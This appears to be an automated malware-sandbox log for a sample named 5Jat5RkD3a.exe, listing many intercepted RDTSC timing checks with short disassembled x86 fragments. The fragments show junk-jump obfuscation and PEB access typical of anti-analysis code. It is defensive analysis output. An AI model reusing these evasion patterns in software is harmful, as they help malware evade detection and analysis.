Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703004A second address: 7030050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030050 second address: 7030054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030054 second address: 7030058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030058 second address: 70300B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD934BC97E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov edx, eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FD934BC97E4h 0x0000001d mov eax, dword ptr fs:[00000030h] 0x00000023 jmp 00007FD934BC97E0h 0x00000028 sub esp, 18h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70300B4 second address: 70300B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70300B8 second address: 70300BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70300BE second address: 7030168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 5321h 0x00000007 call 00007FD934C4561Eh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jmp 00007FD934C4561Eh 0x00000016 mov dword ptr [esp], ebx 0x00000019 jmp 00007FD934C45620h 0x0000001e mov ebx, dword ptr [eax+10h] 0x00000021 jmp 00007FD934C45620h 0x00000026 xchg eax, esi 0x00000027 jmp 00007FD934C45620h 0x0000002c push eax 0x0000002d jmp 00007FD934C4561Bh 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov eax, ebx 0x00000038 pushfd 0x00000039 jmp 00007FD934C45627h 0x0000003e adc eax, 4EB4C9EEh 0x00000044 jmp 00007FD934C45629h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030168 second address: 7030178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030178 second address: 703017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703017C second address: 7030190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [775606ECh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030190 second address: 7030194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030194 second address: 70301AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70301AC second address: 70301C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov si, F7D1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70301C4 second address: 7030238 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD934BC97DEh 0x00000008 sbb eax, 368C5E28h 0x0000000e jmp 00007FD934BC97DBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FD934BC97E8h 0x0000001c xor ecx, 7B721088h 0x00000022 jmp 00007FD934BC97DBh 0x00000027 popfd 0x00000028 popad 0x00000029 jne 00007FD934BCA586h 0x0000002f jmp 00007FD934BC97E6h 0x00000034 xchg eax, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030238 second address: 7030255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030255 second address: 7030265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030265 second address: 7030269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030269 second address: 7030281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD934BC97DDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030281 second address: 703030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FD934C4561Eh 0x0000000f call dword ptr [77530B60h] 0x00000015 mov eax, 756AE5E0h 0x0000001a ret 0x0000001b jmp 00007FD934C45620h 0x00000020 push 00000044h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FD934C4561Eh 0x00000029 jmp 00007FD934C45625h 0x0000002e popfd 0x0000002f mov edx, esi 0x00000031 popad 0x00000032 pop edi 0x00000033 jmp 00007FD934C4561Ah 0x00000038 xchg eax, edi 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD934C45627h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703030B second address: 703033F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934BC97DFh 0x00000009 and si, 75BEh 0x0000000e jmp 00007FD934BC97E9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030438 second address: 7030553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934C4561Fh 0x00000009 or ch, 0000006Eh 0x0000000c jmp 00007FD934C45629h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FD934C45620h 0x00000018 or ecx, 726418E8h 0x0000001e jmp 00007FD934C4561Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esi+08h], eax 0x0000002a jmp 00007FD934C45626h 0x0000002f mov dword ptr [esi+0Ch], eax 0x00000032 jmp 00007FD934C45620h 0x00000037 mov eax, dword ptr [ebx+4Ch] 0x0000003a jmp 00007FD934C45620h 0x0000003f mov dword ptr [esi+10h], eax 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FD934C4561Eh 0x00000049 sub esi, 03EF10D8h 0x0000004f jmp 00007FD934C4561Bh 0x00000054 popfd 0x00000055 pushfd 0x00000056 jmp 00007FD934C45628h 0x0000005b adc esi, 5BC3DB38h 0x00000061 jmp 00007FD934C4561Bh 0x00000066 popfd 0x00000067 popad 0x00000068 mov eax, dword ptr [ebx+50h] 0x0000006b jmp 00007FD934C45626h 0x00000070 mov dword ptr [esi+14h], eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FD934C45627h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030553 second address: 70305BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007FD934BC97DEh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD934BC97DDh 0x0000001d jmp 00007FD934BC97DBh 0x00000022 popfd 0x00000023 jmp 00007FD934BC97E8h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70305BA second address: 703067B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD934C45625h 0x00000012 adc eax, 46563206h 0x00000018 jmp 00007FD934C45621h 0x0000001d popfd 0x0000001e mov bl, ch 0x00000020 popad 0x00000021 mov dword ptr [esi+1Ch], eax 0x00000024 jmp 00007FD934C45623h 0x00000029 mov eax, dword ptr [ebx+5Ch] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FD934C45624h 0x00000033 sub ecx, 54E8B308h 0x00000039 jmp 00007FD934C4561Bh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007FD934C45628h 0x00000045 add ch, 00000068h 0x00000048 jmp 00007FD934C4561Bh 0x0000004d popfd 0x0000004e popad 0x0000004f mov dword ptr [esi+20h], eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FD934C45625h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703067B second address: 703071A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 36D34612h 0x00000008 call 00007FD934BC97E3h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+60h] 0x00000014 jmp 00007FD934BC97DFh 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c jmp 00007FD934BC97E6h 0x00000021 mov eax, dword ptr [ebx+64h] 0x00000024 jmp 00007FD934BC97E0h 0x00000029 mov dword ptr [esi+28h], eax 0x0000002c jmp 00007FD934BC97E0h 0x00000031 mov eax, dword ptr [ebx+68h] 0x00000034 jmp 00007FD934BC97E0h 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FD934BC97E7h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703071A second address: 7030811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007FD934C4561Bh 0x0000000c sub al, FFFFFF8Eh 0x0000000f jmp 00007FD934C45629h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ax, word ptr [ebx+6Ch] 0x0000001c jmp 00007FD934C4561Eh 0x00000021 mov word ptr [esi+30h], ax 0x00000025 jmp 00007FD934C45620h 0x0000002a mov ax, word ptr [ebx+00000088h] 0x00000031 jmp 00007FD934C45620h 0x00000036 mov word ptr [esi+32h], ax 0x0000003a jmp 00007FD934C45620h 0x0000003f mov eax, dword ptr [ebx+0000008Ch] 0x00000045 jmp 00007FD934C45620h 0x0000004a mov dword ptr [esi+34h], eax 0x0000004d jmp 00007FD934C45620h 0x00000052 mov eax, dword ptr [ebx+18h] 0x00000055 jmp 00007FD934C45620h 0x0000005a mov dword ptr [esi+38h], eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov esi, edx 0x00000062 pushfd 0x00000063 jmp 00007FD934C45629h 0x00000068 or ch, 00000046h 0x0000006b jmp 00007FD934C45621h 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030811 second address: 7030821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030821 second address: 7030825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030825 second address: 7030845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+1Ch] 0x0000000b pushad 0x0000000c mov bx, B600h 0x00000010 mov dx, 322Ch 0x00000014 popad 0x00000015 mov dword ptr [esi+3Ch], eax 0x00000018 pushad 0x00000019 movsx edx, cx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030955 second address: 70309E9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 05A4DFE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b pushad 0x0000000c call 00007FD934C45628h 0x00000011 push esi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 mov cl, dh 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-10h] 0x0000001a pushad 0x0000001b movzx esi, dx 0x0000001e pushfd 0x0000001f jmp 00007FD934C45621h 0x00000024 sbb eax, 1D26CC66h 0x0000002a jmp 00007FD934C45621h 0x0000002f popfd 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 pushfd 0x00000038 jmp 00007FD934C45629h 0x0000003d sub cx, DC76h 0x00000042 jmp 00007FD934C45621h 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70309E9 second address: 70309F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70309F9 second address: 7030A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD934C45623h 0x00000012 and cl, 0000005Eh 0x00000015 jmp 00007FD934C45629h 0x0000001a popfd 0x0000001b mov eax, 141C6327h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030B0E second address: 7030B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030B14 second address: 7030B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030B18 second address: 7030B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007FD934BC97E7h 0x00000010 lea eax, dword ptr [ebx+78h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD934BC97E4h 0x0000001a or ah, FFFFFFF8h 0x0000001d jmp 00007FD934BC97DBh 0x00000022 popfd 0x00000023 mov ecx, 17F24C2Fh 0x00000028 popad 0x00000029 push 00000001h 0x0000002b jmp 00007FD934BC97E2h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FD934BC97DDh 0x0000003a jmp 00007FD934BC97DBh 0x0000003f popfd 0x00000040 mov dx, cx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030B9E second address: 7030BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45625h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030BBE second address: 7030BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030BC4 second address: 7030C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 pushfd 0x00000006 jmp 00007FD934C4561Ch 0x0000000b xor ah, 00000048h 0x0000000e jmp 00007FD934C4561Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 jmp 00007FD934C45626h 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 pushad 0x00000021 mov dh, ch 0x00000023 pushad 0x00000024 mov cx, dx 0x00000027 popad 0x00000028 popad 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD934C45623h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030C21 second address: 7030C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030C27 second address: 7030C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030C2B second address: 7030C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD934BC97E5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030CE3 second address: 7030CF4 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 lea eax, dword ptr [ebx+70h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030CF4 second address: 7030CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030CF8 second address: 7030CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030CFE second address: 7030D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030D04 second address: 7030D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030D08 second address: 7030D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b mov ebx, 77FE0060h 0x00000010 mov cx, bx 0x00000013 popad 0x00000014 push ecx 0x00000015 pushad 0x00000016 movzx eax, di 0x00000019 movsx edi, ax 0x0000001c popad 0x0000001d mov dword ptr [esp], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030D2E second address: 7030D34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030D34 second address: 7030D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030D4D second address: 7030D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030DCB second address: 7030E41 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD934BC97E8h 0x00000008 add cl, FFFFFFB8h 0x0000000b jmp 00007FD934BC97DBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 6A2DDDEFh 0x00000018 popad 0x00000019 js 00007FD9A5078088h 0x0000001f pushad 0x00000020 mov di, ax 0x00000023 pushfd 0x00000024 jmp 00007FD934BC97DCh 0x00000029 adc eax, 32082418h 0x0000002f jmp 00007FD934BC97DBh 0x00000034 popfd 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp-14h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD934BC97E5h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030E41 second address: 7030F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934C45627h 0x00000009 or ax, AE3Eh 0x0000000e jmp 00007FD934C45629h 0x00000013 popfd 0x00000014 call 00007FD934C45620h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ecx, esi 0x0000001f pushad 0x00000020 pushad 0x00000021 mov di, 7150h 0x00000025 mov eax, ebx 0x00000027 popad 0x00000028 call 00007FD934C45625h 0x0000002d pushad 0x0000002e popad 0x0000002f pop esi 0x00000030 popad 0x00000031 mov dword ptr [esi+0Ch], eax 0x00000034 jmp 00007FD934C4561Dh 0x00000039 mov edx, 775606ECh 0x0000003e pushad 0x0000003f mov esi, 64D1DAE3h 0x00000044 mov di, ax 0x00000047 popad 0x00000048 sub eax, eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movzx eax, dx 0x00000050 pushfd 0x00000051 jmp 00007FD934C45629h 0x00000056 xor ch, FFFFFF96h 0x00000059 jmp 00007FD934C45621h 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030F0A second address: 7030F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030F1A second address: 7030F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lock cmpxchg dword ptr [edx], ecx 0x0000000f pushad 0x00000010 mov ecx, 5177A90Bh 0x00000015 mov ch, CAh 0x00000017 popad 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030F3F second address: 7030F45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030F45 second address: 7030FEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45627h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD934C45621h 0x00000013 adc cl, 00000066h 0x00000016 jmp 00007FD934C45621h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FD934C45620h 0x00000022 adc si, 4B08h 0x00000027 jmp 00007FD934C4561Bh 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f jne 00007FD9A50F3D43h 0x00000035 jmp 00007FD934C45626h 0x0000003a mov edx, dword ptr [ebp+08h] 0x0000003d jmp 00007FD934C45620h 0x00000042 mov eax, dword ptr [esi] 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FD934C4561Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030FEE second address: 7030FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030FF2 second address: 7030FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7030FF8 second address: 7031056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934BC97DCh 0x00000009 or ecx, 1B9E2AF8h 0x0000000f jmp 00007FD934BC97DBh 0x00000014 popfd 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [edx], eax 0x0000001d pushad 0x0000001e mov si, di 0x00000021 pushfd 0x00000022 jmp 00007FD934BC97DDh 0x00000027 and esi, 26D3B796h 0x0000002d jmp 00007FD934BC97E1h 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [esi+04h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7031056 second address: 703105A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703105A second address: 703106D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
